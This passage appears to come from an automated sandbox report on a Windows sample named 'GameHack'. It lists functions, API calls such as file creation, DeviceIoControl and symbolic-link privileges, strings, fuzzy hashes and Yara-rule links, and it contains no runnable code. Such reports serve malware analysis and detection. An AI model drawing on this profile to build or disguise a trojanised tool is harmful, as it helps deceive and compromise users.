                                      • GetWindowRect.USER32(00000000,?), ref: 00EDDCD5
                                      • GetWindow.USER32(00000000,00000002), ref: 00EDDD47
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                      • String ID: $%s:$CAPTION$d
                                      • API String ID: 2407758923-2512411981
                                      • Opcode ID: 13aa109a271271af8e776729d85f654141f141ebad2000c2ae99e2b8f56d3e89
                                      • Instruction ID: 22d86e1d6fb456606f675e4195949bca4765501b6c7098b2fb21ae4a6c9e219c
                                      • Opcode Fuzzy Hash: 13aa109a271271af8e776729d85f654141f141ebad2000c2ae99e2b8f56d3e89
                                      • Instruction Fuzzy Hash: 99819271108305AFD710DF68CD85E6BBBE9EBC9714F04191EFA84E3291D670E90ACB52
                                      Function 00ED718C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 296fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00ED7191
                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 00ED72F1
                                      • CloseHandle.KERNEL32(00000000), ref: 00ED7301
                                        • Part of subcall function 00ED7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00ED7C04
                                        • Part of subcall function 00ED7BF5: GetLastError.KERNEL32 ref: 00ED7C4A
                                        • Part of subcall function 00ED7BF5: CloseHandle.KERNEL32(?), ref: 00ED7C59
                                      • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 00ED730C
                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00ED741A
                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00ED7446
                                      • CloseHandle.KERNEL32(?), ref: 00ED7457
                                      • GetLastError.KERNEL32 ref: 00ED7467
                                      • RemoveDirectoryW.KERNEL32(?), ref: 00ED74B3
                                      • DeleteFileW.KERNEL32(?), ref: 00ED74DB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                      • API String ID: 3935142422-3508440684
                                      • Opcode ID: 618c60e7de090b81ab204a4fd88b82c369c70c0bf26d063b99c5b44951075010
                                      • Instruction ID: 8360fa29b2811c65dfa9879e21e3d2faf324178857778e86c02a0828f1e0e26e
                                      • Opcode Fuzzy Hash: 618c60e7de090b81ab204a4fd88b82c369c70c0bf26d063b99c5b44951075010
                                      • Instruction Fuzzy Hash: DAB1E571904219ABDF21DF60DC41BEE7BB8EF04304F0454AAF955F7282E734AA46CB61
                                      Function 00EFC233 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 00EFC277
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBE2F
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBE41
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBE53
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBE65
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBE77
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBE89
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBE9B
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBEAD
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBEBF
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBED1
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBEE3
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBEF5
                                        • Part of subcall function 00EFBE12: _free.LIBCMT ref: 00EFBF07
                                      • _free.LIBCMT ref: 00EFC26C
                                        • Part of subcall function 00EF84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00EFBFA7,00F03958,00000000,00F03958,00000000,?,00EFBFCE,00F03958,00000007,00F03958,?,00EFC3CB,00F03958), ref: 00EF84F4
                                        • Part of subcall function 00EF84DE: GetLastError.KERNEL32(00F03958,?,00EFBFA7,00F03958,00000000,00F03958,00000000,?,00EFBFCE,00F03958,00000007,00F03958,?,00EFC3CB,00F03958,00F03958), ref: 00EF8506
                                      • _free.LIBCMT ref: 00EFC28E
                                      • _free.LIBCMT ref: 00EFC2A3
                                      • _free.LIBCMT ref: 00EFC2AE
                                      • _free.LIBCMT ref: 00EFC2D0
                                      • _free.LIBCMT ref: 00EFC2E3
                                      • _free.LIBCMT ref: 00EFC2F1
                                      • _free.LIBCMT ref: 00EFC2FC
                                      • _free.LIBCMT ref: 00EFC334
                                      • _free.LIBCMT ref: 00EFC33B
                                      • _free.LIBCMT ref: 00EFC358
                                      • _free.LIBCMT ref: 00EFC370
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: e608033bef98b2edc3e3548c579284d88c774a28e2038594897f97eef90d809b
                                      • Instruction ID: 6f0add214c03846413d9919326089a97483b63781a4729522841a65842a7f254
                                      • Opcode Fuzzy Hash: e608033bef98b2edc3e3548c579284d88c774a28e2038594897f97eef90d809b
                                      • Instruction Fuzzy Hash: B8316F3260060D9FEB20AE78DA45B7673E9FF00354F34A469E659E7561DF31AC40DB50
                                      Function 00EECD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindow.USER32(?,00000005), ref: 00EECD51
                                      • GetClassNameW.USER32(00000000,?,00000800), ref: 00EECD7D
                                        • Part of subcall function 00EE17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00EDBB05,00000000,.exe,?,?,00000800,?,?,00EE85DF,?), ref: 00EE17C2
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00EECD99
                                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00EECDB0
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00EECDC4
                                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00EECDED
                                      • DeleteObject.GDI32(00000000), ref: 00EECDF4
                                      • GetWindow.USER32(00000000,00000002), ref: 00EECDFD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                      • String ID: STATIC
                                      • API String ID: 3820355801-1882779555
                                      • Opcode ID: bbda76716b9a07428e62fba9b8488b3a3cbd482fc0927dd8497c5ba8a3fcda92
                                      • Instruction ID: 4d1599c06a39c65bcc560b20fd460efce6d7891533df51fc45a952de9522403e
                                      • Opcode Fuzzy Hash: bbda76716b9a07428e62fba9b8488b3a3cbd482fc0927dd8497c5ba8a3fcda92
                                      • Instruction Fuzzy Hash: DE113A7214039CBBE3206B219C49FAF369DFF45755F105020FB46B10E2CA708D16A6A1
                                      Function 00EF8EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00EF8EC5
                                        • Part of subcall function 00EF84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00EFBFA7,00F03958,00000000,00F03958,00000000,?,00EFBFCE,00F03958,00000007,00F03958,?,00EFC3CB,00F03958), ref: 00EF84F4
                                        • Part of subcall function 00EF84DE: GetLastError.KERNEL32(00F03958,?,00EFBFA7,00F03958,00000000,00F03958,00000000,?,00EFBFCE,00F03958,00000007,00F03958,?,00EFC3CB,00F03958,00F03958), ref: 00EF8506
                                      • _free.LIBCMT ref: 00EF8ED1
                                      • _free.LIBCMT ref: 00EF8EDC
                                      • _free.LIBCMT ref: 00EF8EE7
                                      • _free.LIBCMT ref: 00EF8EF2
                                      • _free.LIBCMT ref: 00EF8EFD
                                      • _free.LIBCMT ref: 00EF8F08
                                      • _free.LIBCMT ref: 00EF8F13
                                      • _free.LIBCMT ref: 00EF8F1E
                                      • _free.LIBCMT ref: 00EF8F2C
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: 3847ffad63e580b09d672fd40cbdec73f3301ce276c93a9e069d87030be21dee
                                      • Instruction ID: bd046049473945d8213c493ba6d4cb8bd453b4f761ce52c76ae0b362687daa8d
                                      • Opcode Fuzzy Hash: 3847ffad63e580b09d672fd40cbdec73f3301ce276c93a9e069d87030be21dee
                                      • Instruction Fuzzy Hash: D411B67650010DBFCB11EF54CA52CEE3BA9FF04350B5150A5FA18AF666DA32EE51DB80
                                      Function 00ED2162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ;%u$x%u$xc%u
                                      • API String ID: 0-2277559157
                                      • Opcode ID: a981f80fb8d6fd96799a57ed88ff0b52eab932d3a9cb1eb2c30d1e7b4ef1d525
                                      • Instruction ID: 7e7ff596285469a1ab90b0c1e9ccf723555abf13f6615dde5cda7d0d65c9a197
                                      • Opcode Fuzzy Hash: a981f80fb8d6fd96799a57ed88ff0b52eab932d3a9cb1eb2c30d1e7b4ef1d525
                                      • Instruction Fuzzy Hash: 76F146706042415BDB25DF348891BEE77D9EFA0344F08646FFA85BB383DA64D846C7A2
                                      Function 00EEACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00ED130B: GetDlgItem.USER32(00000000,00003021), ref: 00ED134F
                                        • Part of subcall function 00ED130B: SetWindowTextW.USER32(00000000,00F035B4), ref: 00ED1365
                                      • EndDialog.USER32(?,00000001), ref: 00EEAD20
                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 00EEAD47
                                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00EEAD60
                                      • SetWindowTextW.USER32(?,?), ref: 00EEAD71
                                      • GetDlgItem.USER32(?,00000065), ref: 00EEAD7A
                                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00EEAD8E
                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00EEADA4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: MessageSend$Item$TextWindow$Dialog
                                      • String ID: LICENSEDLG
                                      • API String ID: 3214253823-2177901306
                                      • Opcode ID: 8ddf622cff7c568050981c51e738870aab73f7dfe86d5fc22c4de5e45ff99367
                                      • Instruction ID: 9054f55c86f0ed726b4866f649ead14d9629155efc32fa4557e888fe9dca6f18
                                      • Opcode Fuzzy Hash: 8ddf622cff7c568050981c51e738870aab73f7dfe86d5fc22c4de5e45ff99367
                                      • Instruction Fuzzy Hash: CA21073124414DBBD2255F72ED49E7B3BADFB46B5AF054028F600F25A0CB62A901F632
                                      Function 00ED9443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00ED9448
                                      • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00ED946B
                                      • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00ED948A
                                        • Part of subcall function 00EE17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00EDBB05,00000000,.exe,?,?,00000800,?,?,00EE85DF,?), ref: 00EE17C2
                                      • _swprintf.LIBCMT ref: 00ED9526
                                        • Part of subcall function 00ED400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00ED401D
                                      • MoveFileW.KERNEL32(?,?), ref: 00ED9595
                                      • MoveFileW.KERNEL32(?,?), ref: 00ED95D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                      • String ID: rtmp%d
                                      • API String ID: 2111052971-3303766350
                                      • Opcode ID: b6abde3c4ceced626714163df55e7e450d084f893cddf7bfd18089ac1ffb1e6f
                                      • Instruction ID: b17e13b46e49cba74d489e642fd27d4977de1e11bfc420d316e53c34e401f528
                                      • Opcode Fuzzy Hash: b6abde3c4ceced626714163df55e7e450d084f893cddf7bfd18089ac1ffb1e6f
                                      • Instruction Fuzzy Hash: 58416071901158A6CB20EB60CC85ADA73BCEF15384F0454E6B559B3242EB348B8ADB60
                                      Function 00EE8E62 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 125memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00EE8F38
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00EE8F59
                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00EE8F80
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Global$AllocByteCharCreateMultiStreamWide
                                      • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                      • API String ID: 4094277203-4209811716
                                      • Opcode ID: 81e2b96e51cfea3b46865629c520ced51a833246933725efd6e16a61498ef71a
                                      • Instruction ID: 1090da91b68096e0c07737080f8fdbfe542025e31f6df8c95c9d49085bf565b5
                                      • Opcode Fuzzy Hash: 81e2b96e51cfea3b46865629c520ced51a833246933725efd6e16a61498ef71a
                                      • Instruction Fuzzy Hash: 8531253260835D6BD724AB319C02FBB77A8AF81764F141119FA05B61D2EF749A09D3A2
                                      Function 00EE0A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __aulldiv.LIBCMT ref: 00EE0A9D
                                        • Part of subcall function 00EDACF5: GetVersionExW.KERNEL32(?), ref: 00EDAD1A
                                      • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00EE0AC0
                                      • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00EE0AD2
                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00EE0AE3
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EE0AF3
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00EE0B03
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00EE0B3D
                                      • __aullrem.LIBCMT ref: 00EE0BCB
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                      • String ID:
                                      • API String ID: 1247370737-0
                                      • Opcode ID: 60de26f0393a26b55e5b02218d13e684d61f47fc988669fd567e3e292d3dc4cd
                                      • Instruction ID: 823e9e4600ae43c6f9adbdc8271327f5efde3bfba2fc346e4bc2a570a5150707
                                      • Opcode Fuzzy Hash: 60de26f0393a26b55e5b02218d13e684d61f47fc988669fd567e3e292d3dc4cd
                                      • Instruction Fuzzy Hash: 464139B140834A9FC310DF65C88496BFBF8FB88718F004A2EF59692650E779E589DB52
                                      Function 00EFEE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00EFF5A2,?,00000000,?,00000000,00000000), ref: 00EFEE6F
                                      • __fassign.LIBCMT ref: 00EFEEEA
                                      • __fassign.LIBCMT ref: 00EFEF05
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00EFEF2B
                                      • WriteFile.KERNEL32(?,?,00000000,00EFF5A2,00000000,?,?,?,?,?,?,?,?,?,00EFF5A2,?), ref: 00EFEF4A
                                      • WriteFile.KERNEL32(?,?,00000001,00EFF5A2,00000000,?,?,?,?,?,?,?,?,?,00EFF5A2,?), ref: 00EFEF83
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: 0aecf1a896cc01b5deb2c3161adf98c454532e9c00c225819554bdbd2a254823
                                      • Instruction ID: 0b1babd81b00cff2d1e05de7b9bb958aa182ac66db522163c646019c175c5ffb
                                      • Opcode Fuzzy Hash: 0aecf1a896cc01b5deb2c3161adf98c454532e9c00c225819554bdbd2a254823
                                      • Instruction Fuzzy Hash: 61518171A0024D9FDB10CFA8D845AFEBBF9FF09310F14551AEA55F72A1E670AA41CB60
                                      Function 00EEC534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTempPathW.KERNEL32(00000800,?), ref: 00EEC54A
                                      • _swprintf.LIBCMT ref: 00EEC57E
                                        • Part of subcall function 00ED400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00ED401D
                                      • SetDlgItemTextW.USER32(?,00000066,00F1946A), ref: 00EEC59E
                                      • _wcschr.LIBVCRUNTIME ref: 00EEC5D1
                                      • EndDialog.USER32(?,00000001), ref: 00EEC6B2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                                      • String ID: %s%s%u
                                      • API String ID: 2892007947-1360425832
                                      • Opcode ID: df4ff471d00c0ccb33bd504edf6a91e63e065ab683805e1fe38fc3862b063962
                                      • Instruction ID: fc9fe04702399f87f190586065adb4dd6fa164ff759b1dbfd8a637ddef1a7439
                                      • Opcode Fuzzy Hash: df4ff471d00c0ccb33bd504edf6a91e63e065ab683805e1fe38fc3862b063962
                                      • Instruction Fuzzy Hash: 6A410571D0065CAADB26DBA1CC45EEA77BCEF08705F10A0A2E509F61A0E7719BC5CB50
                                      Function 00EE9635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
                                      Download Yara Rule
                                      APIs
                                      • ShowWindow.USER32(?,00000000), ref: 00EE964E
                                      • GetWindowRect.USER32(?,00000000), ref: 00EE9693
                                      • ShowWindow.USER32(?,00000005,00000000), ref: 00EE972A
                                      • SetWindowTextW.USER32(?,00000000), ref: 00EE9732
                                      • ShowWindow.USER32(00000000,00000005), ref: 00EE9748
                                      Strings
                                      Memory Dump Source
